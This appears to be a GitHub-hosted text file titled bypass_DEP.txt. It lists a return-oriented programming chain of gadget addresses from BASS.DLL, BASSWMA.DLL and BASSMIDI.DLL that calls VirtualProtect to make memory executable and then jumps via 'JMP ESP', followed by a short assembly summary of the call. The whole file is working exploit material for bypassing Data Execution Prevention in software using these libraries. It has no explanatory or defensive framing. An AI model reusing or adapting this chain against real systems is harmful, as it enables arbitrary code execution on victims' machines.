-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbypass_DEP.txt
29 lines (26 loc) · 956 Bytes
/
bypass_DEP.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Example:
0X10010157, # POP EBP # RETN [BASS.DLL]
0X10010157, # SKIP 4 BYTES [BASS.DLL]
0X10015F77, # POP EAX # RETN [BASS.DLL]
0XFFFFFDFF, # VALUE TO NEGATE, WILL BECOME 0X00000201
0X10014DB4, # NEG EAX # RETN [BASS.DLL]
0X10032F72, # XCHG EAX,EBX # RETN 0X00 [BASS.DLL]
0X10015F82, # POP EAX # RETN [BASS.DLL]
0XFFFFFFC0, # VALUE TO NEGATE, WILL BECOME 0X00000040
0X10014DB4, # NEG EAX # RETN [BASS.DLL]
0X10038A6D, # XCHG EAX,EDX # RETN [BASS.DLL]
0X101049EC, # POP ECX # RETN [BASSWMA.DLL]
0X101082DB, # &WRITABLE LOCATION [BASSWMA.DLL]
0X1001621C, # POP EDI # RETN [BASS.DLL]
0X1001DC05, # RETN (ROP NOP) [BASS.DLL]
0X10604154, # POP ESI # RETN [BASSMIDI.DLL]
0X10101C02, # JMP [EAX] [BASSWMA.DLL]
0X10015FE7, # POP EAX # RETN [BASS.DLL]
0X1060E25C, # PTR TO &VIRTUALPROTECT() [IAT BASSMIDI.DLL]
0X1001D7A5, # PUSHAD # RETN [BASS.DLL]
0X10022AA7, # PTR TO 'JMP ESP' [BASS.DLL]
In ASM:
PUSH 0X201
PUSH 0X40
PUSH WRITEBLE_LOCATION
CALL VIRTUALPROTECT